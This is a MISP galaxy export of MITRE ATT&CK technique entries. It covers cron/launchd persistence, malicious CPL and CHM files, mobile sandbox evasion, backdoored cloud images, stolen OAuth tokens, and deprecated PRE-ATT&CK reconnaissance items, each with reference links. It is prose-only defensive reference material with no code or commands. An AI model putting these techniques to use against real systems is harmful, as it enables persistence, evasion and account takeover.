https://attack.mitre.org/techniques/T1166

https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

Local Job Scheduling - T1168

On Linux and macOS systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, (Citation: Die.net Linux crontab Man Page) at, (Citation: Die.net Linux at Man Page) and launchd. (Citation: AppleDocs Scheduling Timed Jobs) Unlike [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) on Windows systems, job scheduling on Linux-based systems cannot be done remotely unless used in conjunction within an established remote session, like secure shell (SSH).

cron

System-wide cron jobs are installed by modifying <code>/etc/crontab</code> file, <code>/etc/cron.d/</code> directory or other locations supported by the Cron daemon, while per-user cron jobs are installed using crontab with specifically formatted crontab files. (Citation: AppleDocs Scheduling Timed Jobs) This works on macOS and Linux systems.

Those methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use job scheduling to execute programs at system startup or on a scheduled basis for Persistence, (Citation: Janicab) (Citation: Methods of Mac Malware Persistence) (Citation: Malware Persistence on OS X) (Citation: Avast Linux Trojan Cron Persistence) to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.

at

The at program is another means on POSIX-based systems, including macOS and Linux, to schedule a program or script job for execution at a later date and/or time, which could also be used for the same purposes.

launchd

Each launchd job is described by a different configuration property list (plist) file similar to [Launch Daemon](https://attack.mitre.org/techniques/T1160) or [Launch Agent](https://attack.mitre.org/techniques/T1159), except there is an additional key called <code>StartCalendarInterval</code> with a dictionary of time values. (Citation: AppleDocs Scheduling Timed Jobs) This only works on macOS and OS X.

The tag is: misp-galaxy:mitre-attack-pattern="Local Job Scheduling - T1168"

Table 5875. Table References

Links

http://www.thesafemac.com/new-signed-malware-called-janicab/

https://attack.mitre.org/techniques/T1168

https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/ScheduledJobs.html

https://linux.die.net/man/1/at

https://linux.die.net/man/5/crontab

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Control Panel Items - T1196

Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)

For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)

Adversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.

The tag is: misp-galaxy:mitre-attack-pattern="Control Panel Items - T1196"

Table 5876. Table References

Links

https://attack.mitre.org/techniques/T1196

https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attachments/

https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx

https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf

C2 protocol development - T1352

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1352).

Command and Control (C2 or C&C) is a method by which the adversary communicates with malware. An adversary may use a variety of protocols and methods to execute C2 such as a centralized server, peer to peer, IRC, compromised web sites, or even social media. (Citation: HAMMERTOSS2015)

The tag is: misp-galaxy:mitre-attack-pattern="C2 protocol development - T1352"

Table 5877. Table References

Links

https://attack.mitre.org/techniques/T1352

Compiled HTML File - T1223

Compiled HTML files (.chm) are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)

Adversaries may abuse this technology to conceal malicious code. A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application whitelisting on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1223"

Table 5878. Table References

Links

https://attack.mitre.org/techniques/T1223

https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk

https://msdn.microsoft.com/windows/desktop/ms524405

https://msdn.microsoft.com/windows/desktop/ms644670

https://msitpros.com/?p=3909

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625

Create implementation plan - T1232

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1232).

Implementation plans specify how the goals of the strategic plan will be executed. (Citation: ChinaCollectionPlan) (Citation: OrderOfBattle)

The tag is: misp-galaxy:mitre-attack-pattern="Create implementation plan - T1232"

Table 5879. Table References

Links

https://attack.mitre.org/techniques/T1232

Determine operational element - T1242

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1242).

If going from strategic down to tactical or vice versa, an adversary would next consider the operational element. For example, the specific company within an industry or agency within a government. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Determine operational element - T1242"

Table 5880. Table References

Links

https://attack.mitre.org/techniques/T1242

Identify gap areas - T1225

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1225).

Leadership identifies gap areas that generate a compelling need to generate a Key Intelligence Topic (KIT) or Key Intelligence Question (KIQ). (Citation: ODNIIntegration) (Citation: ICD115)

The tag is: misp-galaxy:mitre-attack-pattern="Identify gap areas - T1225"

Table 5881. Table References

Links

https://attack.mitre.org/techniques/T1225

Map network topology - T1252

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1252).

A network topology is the arrangement of the various elements of a network (e.g., servers, workstations, printers, routers, firewalls, etc.). Mapping a network allows an adversary to understand how the elements are connected or related. (Citation: man traceroute) (Citation: Shodan Tutorial)

The tag is: misp-galaxy:mitre-attack-pattern="Map network topology - T1252"

Table 5882. Table References

Links

https://attack.mitre.org/techniques/T1252

Enumerate client configurations - T1262

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1262).

Client configurations information such as the operating system and web browser, along with additional information such as version or language, are often transmitted as part of web browsing communications. This can be accomplished in several ways including use of a compromised web site to collect details on visiting computers. (Citation: UnseenWorldOfCookies) (Citation: Panopticlick)

The tag is: misp-galaxy:mitre-attack-pattern="Enumerate client configurations - T1262"

Table 5883. Table References

Links

https://attack.mitre.org/techniques/T1262

Identify business relationships - T1272

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1272).

Business relationship information includes the associates of a target and may be discovered via social media sites such as [LinkedIn](https://www.linkedin.com) or public press releases announcing new partnerships between organizations or people (such as key hire announcements in industry articles). This information may be used by an adversary to shape social engineering attempts (exploiting who a target expects to hear from) or to plan for technical actions such as exploiting network trust relationship. (Citation: RSA-APTRecon) (Citation: Scasny2015)

The tag is: misp-galaxy:mitre-attack-pattern="Identify business relationships - T1272"

Identify business relationships - T1272 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Identify business relationships - T1283" with estimative-language:likelihood-probability="almost-certain"

Table 5884. Table References

Links

https://attack.mitre.org/techniques/T1272

Determine physical locations - T1282

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1282).

Physical locality information may be used by an adversary to shape social engineering attempts (language, culture, events, weather, etc.) or to plan for physical actions such as dumpster diving or attempting to access a facility. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Determine physical locations - T1282"

Table 5885. Table References

Links

https://attack.mitre.org/techniques/T1282

Test signature detection - T1292

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1292).

An adversary can test the detections of malicious emails or files by using publicly available services, such as virus total, to see if their files or emails cause an alert. They can also use similar services that are not openly available and don’t publicly publish results or they can test on their own internal infrastructure. (Citation: WiredVirusTotal)

The tag is: misp-galaxy:mitre-attack-pattern="Test signature detection - T1292"

Table 5886. Table References

Links

https://attack.mitre.org/techniques/T1292

Access Contact List - T1432

An adversary could call standard operating system APIs from a malicious application to gather contact list (i.e., address book) data, or with escalated privileges could directly access files containing contact list data.

The tag is: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432"

Table 5887. Table References

Links

https://attack.mitre.org/techniques/T1432

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html

Network Service Scanning - T1423

Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans from the mobile device. This technique may take advantage of the mobile device’s access to an internal enterprise network either through local connectivity or through a Virtual Private Network (VPN).

The tag is: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1423"

Table 5888. Table References

Links

https://attack.mitre.org/techniques/T1423

Archive Collected Data - T1532

Adversaries may compress and/or encrypt data that is collected prior to exfiltration. Compressing data can help to obfuscate its contents and minimize use of network resources. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.

Both compression and encryption are done prior to exfiltration, and can be performed using a utility, programming library, or custom algorithm.

The tag is: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1532"

Table 5889. Table References

Links

https://attack.mitre.org/techniques/T1532

Evade Analysis Environment - T1523

Malicious applications may attempt to detect their operating environment prior to fully executing their payloads. These checks are often used to ensure the application is not running within an analysis environment such as a sandbox used for application vetting, security research, or reverse engineering. Adversaries may use many different checks such as physical sensors, location, and system properties to fingerprint emulators and sandbox environments.(Citation: Talos Gustuff Apr 2019)(Citation: ThreatFabric Cerberus)(Citation: Xiao-ZergHelper)(Citation: Cyberscoop Evade Analysis January 2019) Adversaries may access android.os.SystemProperties via Java reflection to obtain specific system information.(Citation: Github Anti-emulator) Standard values such as phone number, IMEI, IMSI, device IDs, and device drivers may be checked against default signatures of common sandboxes.(Citation: Sophos Anti-emulation)

The tag is: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523"

Table 5890. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-ios-code-review/

https://attack.mitre.org/techniques/T1523

https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html

https://github.com/strazzere/anti-emulator

https://news.sophos.com/en-us/2017/04/13/android-malware-anti-emulation-techniques/

https://www.cyberscoop.com/android-malware-motion-detection-trend-micro/

https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html

Conduct passive scanning - T1253

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1253).

Passive scanning is the act of looking at existing network traffic in order to identify information about the communications system. (Citation: SurveyDetectionStrategies) (Citation: CyberReconPaper)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct passive scanning - T1253"

Table 5891. Table References

Links

https://attack.mitre.org/techniques/T1253

Fast Flux DNS - T1325

This technique has been deprecated. Please use [Fast Flux DNS](https://attack.mitre.org/techniques/T1568/001).

A technique in which a fully qualified domain name has multiple IP addresses assigned to it which are swapped with extreme frequency, using a combination of round robin IP address and short Time-To-Live (TTL) for a DNS resource record. (Citation: HoneynetFastFlux) (Citation: MisnomerFastFlux) (Citation: MehtaFastFluxPt1) (Citation: MehtaFastFluxPt2)

The tag is: misp-galaxy:mitre-attack-pattern="Fast Flux DNS - T1325"

Table 5892. Table References

Links

https://attack.mitre.org/techniques/T1325

https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-1/#gref

https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-2/#gref

Subvert Trust Controls - T1632

Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted applications. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features include: an app being allowed to run because it is signed by a valid code signing certificate; an OS prompt alerting the user that an app came from an untrusted source; or getting an indication that you are about to connect to an untrusted site. The method adversaries use will depend on the specific mechanism they seek to subvert.

The tag is: misp-galaxy:mitre-attack-pattern="Subvert Trust Controls - T1632"

Table 5893. Table References

Links

https://attack.mitre.org/techniques/T1632

https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-7.html

Domain registration hijacking - T1326

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1326).

Domain Registration Hijacking is the act of changing the registration of a domain name without the permission of the original registrant. (Citation: ICANNDomainNameHijacking)

The tag is: misp-galaxy:mitre-attack-pattern="Domain registration hijacking - T1326"

Table 5894. Table References

Links

https://attack.mitre.org/techniques/T1326

https://www.icann.org/groups/ssac/documents/sac-007-en

Mine social media - T1273

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1273).

An adversary may research available open source information about a target commonly found on social media sites such as [Facebook](https://www.facebook.com), [Instagram](https://www.instagram.com), or [Pinterest](https://www.pinterest.com). Social media is public by design and provides insight into the interests and potentially inherent weaknesses of a target for exploitation by the adversary. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Mine social media - T1273"

Table 5895. Table References

Links

https://attack.mitre.org/techniques/T1273

Buy domain name - T1328

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1328).

Domain Names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. (Citation: PWCSofacy2014)

The tag is: misp-galaxy:mitre-attack-pattern="Buy domain name - T1328"

Table 5896. Table References

Links

https://attack.mitre.org/techniques/T1328

Identify business relationships - T1283

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1283).

Business relationship information may be used by an adversary to shape social engineering attempts (exploiting who a target expects to hear from) or to plan for technical actions such as exploiting network trust relationship. (Citation: 11StepsAttackers)

The tag is: misp-galaxy:mitre-attack-pattern="Identify business relationships - T1283"

Identify business relationships - T1283 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Identify business relationships - T1272" with estimative-language:likelihood-probability="almost-certain"

Table 5897. Table References

Links

https://attack.mitre.org/techniques/T1283

Fake Developer Accounts - T1442

An adversary could use fake identities, payment cards, etc., to create developer accounts to publish malicious applications to app stores. For example, Oberheide and Miller describe use of this technique in (Citation: Oberheide-Bouncer).

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Fake Developer Accounts - T1442"

Fake Developer Accounts - T1442 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"

Table 5898. Table References

Links

https://attack.mitre.org/techniques/T1442

Conduct active scanning - T1254

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1254).

Active scanning is the act of sending transmissions to end nodes, and analyzing the responses, in order to identify information about the communications system. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct active scanning - T1254"

Table 5899. Table References

Links

https://attack.mitre.org/techniques/T1254

System Information Discovery - T1426

Adversaries may attempt to get detailed information about a device’s operating system and hardware, including versions, patches, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1426) during automated discovery to shape follow-on behaviors, including whether or not to fully infects the target and/or attempts specific actions.

On Android, much of this information is programmatically accessible to applications through the android.os.Build class. (Citation: Android-Build) iOS is much more restrictive with what information is visible to applications. Typically, applications will only be able to query the device model and which version of iOS it is running.

The tag is: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426"

Table 5900. Table References

Links

https://attack.mitre.org/techniques/T1426

https://developer.android.com/reference/android/os/Build

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-12.html

Event Triggered Execution - T1624

Adversaries may establish persistence using system mechanisms that trigger execution based on specific events. Mobile operating systems have means to subscribe to events such as receiving an SMS message, device boot completion, or other device activities.

Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via automatically and repeatedly executing malicious code. After gaining access to a victim’s system, adversaries may create or modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.

The tag is: misp-galaxy:mitre-attack-pattern="Event Triggered Execution - T1624"

Table 5901. Table References

Links

https://attack.mitre.org/techniques/T1624

Identify supply chains - T1246

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1246).

Supply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit the technology or interconnections that are part of the supply chain. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain) (Citation: RSA-supply-chain)

The tag is: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1246"

Identify supply chains - T1246 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1276" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1265" with estimative-language:likelihood-probability="almost-certain"

Table 5902. Table References

Links

https://attack.mitre.org/techniques/T1246

Domain Trust Discovery - T1482

Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)

The tag is: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482"

Table 5903. Table References

Links

https://adsecurity.org/?p=1588

https://attack.mitre.org/techniques/T1482

https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10)

https://posts.specterops.io/a-guide-to-attacking-domain-trusts-971e52cb2944

https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/

Conduct social engineering - T1249

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1249).

Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. (Citation: SEAttackVectors) (Citation: BeachSE2003)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1249"

Conduct social engineering - T1249 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1268" with estimative-language:likelihood-probability="almost-certain"

Table 5904. Table References

Links

https://attack.mitre.org/techniques/T1249

Stored Data Manipulation - T1492

Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1492"

Table 5905. Table References

Links

https://attack.mitre.org/techniques/T1492

https://content.fireeye.com/apt/rpt-apt38

https://www.justice.gov/opa/press-release/file/1092091/download

Implant Internal Image - T1525

Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)

A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Implant Internal Image - T1525"

Table 5906. Table References

Links

https://attack.mitre.org/techniques/T1525

https://github.com/RhinoSecurityLabs/ccat

https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/

Cloud Service Discovery - T1526

An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.

Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)

For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)

Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001) or [Disable or Modify Cloud Logs](https://attack.mitre.org/techniques/T1562/008).

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Service Discovery - T1526"

Table 5907. Table References

Links

https://attack.mitre.org/techniques/T1526

https://docs.microsoft.com/en-us/previous-versions/azure/ad/graph/howto/azure-ad-graph-api-operations-overview

https://docs.microsoft.com/en-us/rest/api/resources/

https://github.com/Azure/Stormspotter

https://github.com/RhinoSecurityLabs/pacu

Device Driver Discovery - T1652

Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).

Many OS utilities may provide information about local device drivers, such as driverquery.exe and the EnumDeviceDrivers() API function on Windows.(Citation: Microsoft Driverquery)(Citation: Microsoft EnumDeviceDrivers) Information about device drivers (as well as associated services, i.e., [System Service Discovery](https://attack.mitre.org/techniques/T1007)) may also be available in the Registry.(Citation: Microsoft Registry Drivers)

On Linux/macOS, device drivers (in the form of kernel modules) may be visible within /dev or using utilities such as lsmod and modinfo.(Citation: Linux Kernel Programming)(Citation: lsmod man)(Citation: modinfo man)

The tag is: misp-galaxy:mitre-attack-pattern="Device Driver Discovery - T1652"

Table 5908. Table References

Links

https://attack.mitre.org/techniques/T1652

https://learn.microsoft.com/windows-hardware/drivers/install/overview-of-registry-trees-and-keys

https://learn.microsoft.com/windows-server/administration/windows-commands/driverquery

https://learn.microsoft.com/windows/win32/api/psapi/nf-psapi-enumdevicedrivers

https://linux.die.net/man/8/modinfo

https://man7.org/linux/man-pages/man8/lsmod.8.html

https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf

Hijack Execution Flow - T1625

Adversaries may execute their own malicious payloads by hijacking the way operating systems run applications. Hijacking execution flow can be for the purposes of persistence since this hijacked execution may reoccur over time.

There are many ways an adversary may hijack the flow of execution. A primary way is by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs or resources, such as file directories, could also be poisoned to include malicious payloads.

The tag is: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1625"

Table 5909. Table References

Links

https://attack.mitre.org/techniques/T1625

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html

Identify supply chains - T1265

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1265).

Supply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit the people, their positions, and relationships, that are part of the supply chain. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain)

The tag is: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1265"

Identify supply chains - T1265 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1276" with estimative-language:likelihood-probability="almost-certain"

Table 5910. Table References

Links

https://attack.mitre.org/techniques/T1265

Application Access Token - T1527

Adversaries may use application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.

Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)

For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)

Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.

The tag is: misp-galaxy:mitre-attack-pattern="Application Access Token - T1527"

Table 5911. Table References

Links

https://attack.mitre.org/techniques/T1527

https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/

https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen

https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens

https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/

